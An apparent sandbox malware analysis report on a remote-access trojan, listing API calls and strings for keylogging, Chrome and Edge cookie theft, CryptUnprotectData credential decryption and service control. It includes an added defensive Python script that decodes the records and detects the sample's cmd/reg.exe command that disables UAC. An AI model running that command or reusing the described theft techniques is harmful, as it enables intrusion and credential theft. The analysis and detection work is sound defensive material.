                                        • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                        APIs
                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                        • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                          • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 4269425633-0
                                        • Opcode ID: 5e5e8e19cee375d44ca851dd311087b36f73d333cf6257bebe020e348e09cec7
                                        • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                        • Opcode Fuzzy Hash: 5e5e8e19cee375d44ca851dd311087b36f73d333cf6257bebe020e348e09cec7
                                        • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
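The service-control records above (OpenServiceW with access 0x20 or 0x40 followed by ControlService with control code 1, 2 or 3), the CreateProcessA record that launches cmd.exe to run reg.exe against the EnableLUA policy value, and the CreateToolhelp32Snapshot/OpenProcess enumeration loop are much easier to read once the hex stack slots are mapped to their Windows constant names. The script below is an added example written for this page; it is not Joe Sandbox tooling and not code recovered from the sample. It parses the report's own "APIs" record lines (the sample input is copied verbatim from the records above) and names the values using documented Windows header constants. Caveat: the argument columns in these records are stack snapshots taken at the call site, "?" marks a slot the sandbox could not resolve, and the columns do not always line up with the API's formal parameters (the OpenSCManagerW rows also carry 0x20/0x40 in the third slot, where 0x20 would read as SC_MANAGER_MODIFY_BOOT_CONFIG), so the script deliberately decodes only the slots that are consistent across these records.

```python
"""Decode Joe Sandbox 'APIs' record lines into named Windows constants.

Added example for this report; not Joe Sandbox tooling and not code from the
sample. Constants are documented Windows header values; REPORT_LINES are copied
verbatim from the API records in the report.
"""
import re
from dataclasses import dataclass
from typing import Optional, Union

Arg = Union[int, str, None]  # hex stack slot, inline string, or '?' (unresolved)

SERVICE_ACCESS = {  # OpenService dwDesiredAccess bits (winsvc.h)
    0x0001: "SERVICE_QUERY_CONFIG", 0x0002: "SERVICE_CHANGE_CONFIG",
    0x0004: "SERVICE_QUERY_STATUS", 0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
    0x0010: "SERVICE_START", 0x0020: "SERVICE_STOP",
    0x0040: "SERVICE_PAUSE_CONTINUE", 0x0080: "SERVICE_INTERROGATE",
    0x0100: "SERVICE_USER_DEFINED_CONTROL",
}
SERVICE_CONTROL = {  # ControlService dwControl codes (winsvc.h)
    1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
    3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE",
}
PROCESS_ACCESS = {  # OpenProcess dwDesiredAccess bits (winnt.h)
    0x0001: "PROCESS_TERMINATE", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
TH32CS_SNAPPROCESS = 0x00000002  # tlhelp32.h
CREATE_NO_WINDOW = 0x08000000    # winbase.h, CreateProcess dwCreationFlags

# One record line: optional bullet, optional "Part of subcall function X:",
# Api.MODULE(slot,slot,...) (no parens for CRT calls), then "ref: <addr>".
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_SLOT = re.compile(r"^[0-9A-Fa-f]{1,8}$")
# reg.exe writing EnableLUA=0 under the UAC policy key: case-insensitive,
# quoted or not, HKLM or HKEY_LOCAL_MACHINE, "0" or "0x0".
UAC_DISABLE_RE = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)\\SOFTWARE\\Microsoft\\Windows'
    r'\\CurrentVersion\\Policies\\System"?.*?/v\s+EnableLUA\b.*?/d\s+(?:0x)?0+\b',
    re.IGNORECASE,
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None              # sandbox could not resolve this stack slot
    if HEX_SLOT.match(tok):
        return int(tok, 16)
    return tok                   # string argument rendered inline by the report


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [parse_arg(t) for t in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16))


def decode_mask(value: int, table: dict) -> str:
    """Name every known bit in an access mask; leftover bits stay as hex."""
    names = [name for bit, name in table.items() if value & bit]
    unknown = value & ~sum(table)
    if unknown:
        names.append(f"0x{unknown:X}")
    return "|".join(names) or "0"


def explain(call: ApiCall) -> Optional[str]:
    a = call.args

    def slot(i):                 # integer value of stack slot i, else None
        return a[i] if i < len(a) and isinstance(a[i], int) else None

    if call.api == "ControlService" and slot(1) is not None:
        return SERVICE_CONTROL.get(a[1], f"dwControl=0x{a[1]:X}")
    if call.api in ("OpenServiceW", "OpenServiceA") and slot(2) is not None:
        return "dwDesiredAccess=" + decode_mask(a[2], SERVICE_ACCESS)
    if call.api == "OpenProcess" and slot(0) is not None:
        return "dwDesiredAccess=" + decode_mask(a[0], PROCESS_ACCESS)
    if call.api == "CreateToolhelp32Snapshot" and slot(0) is not None:
        return ("TH32CS_SNAPPROCESS: process enumeration"
                if a[0] & TH32CS_SNAPPROCESS else f"dwFlags=0x{a[0]:X}")
    if call.api in ("CreateProcessA", "CreateProcessW"):
        cmdline = " ".join(s for s in a[:2] if isinstance(s, str))  # app + args
        notes = []
        if UAC_DISABLE_RE.search(cmdline):
            notes.append("sets EnableLUA=0 (UAC off after next reboot)")
        if slot(5) is not None and a[5] & CREATE_NO_WINDOW:
            notes.append("CREATE_NO_WINDOW")
        return "; ".join(notes) or None
    return None


def summarize(lines):
    """Return (ref, api, note) for every record line with a decodable behaviour."""
    out = []
    for line in lines:
        call = parse_api_line(line)
        note = explain(call) if call else None
        if note:
            out.append((f"{call.ref:08X}", call.api, note))
    return out


REPORT_LINES = [  # copied verbatim from the API records above
    "• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9",
    "• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5",
    "• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD",
    "• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9",
    "• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50",
    r"• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD "
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,"
    r"00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B",
    "• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B",
    "  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5",
    "• _free.LIBCMT ref: 0044824C",
]

if __name__ == "__main__":
    for ref, api, note in summarize(REPORT_LINES):
        print(f"{ref}  {api:<26} {note}")
```

Running it prints one decoded line per record: the three OpenServiceW/ControlService pairs resolve to stop, pause and continue of a target service, the OpenProcess call in the enumeration loop asks only for PROCESS_QUERY_LIMITED_INFORMATION, and the CreateProcessA call combines the EnableLUA write with dwCreationFlags 0x08000000 (CREATE_NO_WINDOW), so the cmd.exe /k shell that stays resident after reg.exe finishes never shows a console. On a live host the same write surfaces as a Sysmon Event ID 13 (RegistryEvent, value set) on HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA, which is the durable indicator to alert on since the process-creation event can be obfuscated.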
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                        • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                        • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                        • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                        • __alloca_probe_16.LIBCMT ref: 004511B1
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                        • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                        • __freea.LIBCMT ref: 0045121D
                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                        • String ID:
                                        • API String ID: 313313983-0
                                        • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                        • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                        • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                        • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                        • _free.LIBCMT ref: 0044F3BF
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        APIs
                                        • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                        • _free.LIBCMT ref: 004482D3
                                        • _free.LIBCMT ref: 004482FA
                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        APIs
                                        • _free.LIBCMT ref: 004509D4
                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                        • _free.LIBCMT ref: 004509E6
                                        • _free.LIBCMT ref: 004509F8
                                        • _free.LIBCMT ref: 00450A0A
                                        • _free.LIBCMT ref: 00450A1C
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        APIs
                                        • _free.LIBCMT ref: 00444066
                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                        • _free.LIBCMT ref: 00444078
                                        • _free.LIBCMT ref: 0044408B
                                        • _free.LIBCMT ref: 0044409C
                                        • _free.LIBCMT ref: 004440AD
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        APIs
                                        • _strpbrk.LIBCMT ref: 0044E738
                                        • _free.LIBCMT ref: 0044E855
                                          • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                          • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                          • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                        Strings
                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                        • String ID: *?$.
                                        • API String ID: 2812119850-3972193922
                                        APIs
                                        Strings
                                        • API ID: CountEventTick
                                        • String ID: !D@$NG
                                        • API String ID: 180926312-2721294649
                                        APIs
                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                          • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        Strings
                                        • API ID: CreateFileKeyboardLayoutNameconnectsend
                                        • String ID: XQG$NG$PG
                                        • API String ID: 1634807452-3565412412
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                        Strings
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: `#D$`#D
                                        • API String ID: 885266447-2450397995
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00443475
                                        • _free.LIBCMT ref: 00443540
                                        • _free.LIBCMT ref: 0044354A
                                        Strings
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        • API String ID: 2506810119-760905667
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                        • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                        Strings
                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                        • String ID: /sort "Visit Time" /stext "$0NG
                                        • API String ID: 368326130-3219657780
                                        APIs
                                        • _wcslen.LIBCMT ref: 004162F5
                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                          • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                          • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                          • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                        Strings
                                        • API ID: _wcslen$CloseCreateValue
                                        • String ID: !D@$okmode$PG
                                        • API String ID: 3411444782-3370592832
                                        APIs
                                          • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                        Strings
                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                        • User Data\Default\Network\Cookies, xrefs: 0040C603
                                        • API ID: ExistsFilePath
                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                        • API String ID: 1174141254-1980882731
                                        APIs
                                          • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                        Strings
                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                        • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                        • API ID: ExistsFilePath
                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                        • API String ID: 1174141254-1980882731
                                        APIs
                                        • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                        • wsprintfW.USER32 ref: 0040B1F3
                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                        Strings
                                        • API ID: EventLocalTimewsprintf
                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                        • API String ID: 1497725170-1359877963
                                        APIs
                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                        • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                        Strings
                                        • API ID: CreateThread$LocalTime$wsprintf
                                        • String ID: Online Keylogger Started
                                        • API String ID: 112202259-1258561607
                                        APIs
                                        • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                        Strings
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: CryptUnprotectData$crypt32
                                        • API String ID: 2574300362-2380590389
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                        • CloseHandle.KERNEL32(?), ref: 004051CA
                                        • SetEvent.KERNEL32(?), ref: 004051D9
                                        Strings
                                        • API ID: CloseEventHandleObjectSingleWait
                                        • String ID: Connection Timeout
                                        • API String ID: 2055531096-499159329
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                        Strings
                                        • API ID: Exception@8Throw
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 2005118841-1866435925
APIs
• RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
• RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
• RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc
• API String ID: 1818849710-4028850238
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
• API String ID: 3628047217-1405518554
APIs
• CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
• ShowWindow.USER32(00000009), ref: 00416C61
• SetForegroundWindow.USER32 ref: 00416C6D
  • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
  • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
  • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
• String ID: !D@
• API String ID: 3446828153-604454484
APIs
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: ExecuteShell
• String ID: /C $cmd.exe$open
• API String ID: 587946157-3896048727
APIs
• TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
• UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
• TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: TerminateThread$HookUnhookWindows
• String ID: pth_unenc
• API String ID: 3123878439-4028850238
APIs
• LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
• GetProcAddress.KERNEL32(00000000), ref: 004014C0
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetLastInputInfo$User32.dll
• API String ID: 2574300362-1519888992
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• API String ID: 1036877536-0
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
• CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
• CloseHandle.KERNEL32(?,?,00000000), ref: 00404DDB
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• API String ID: 3360349984-0
Strings
• [Cleared browsers logins and cookies.], xrefs: 0040C0E4
• Cleared browsers logins and cookies., xrefs: 0040C0F5
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
APIs
  • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
  • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
  • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
• Sleep.KERNEL32(000001F4), ref: 0040A573
• Sleep.KERNEL32(00000064), ref: 0040A5FD
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
• GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• API String ID: 3177248105-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
• GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
• CloseHandle.KERNEL32(00000000), ref: 0041C4E5
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: File$CloseCreateHandleReadSize
• API String ID: 3919263394-0
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
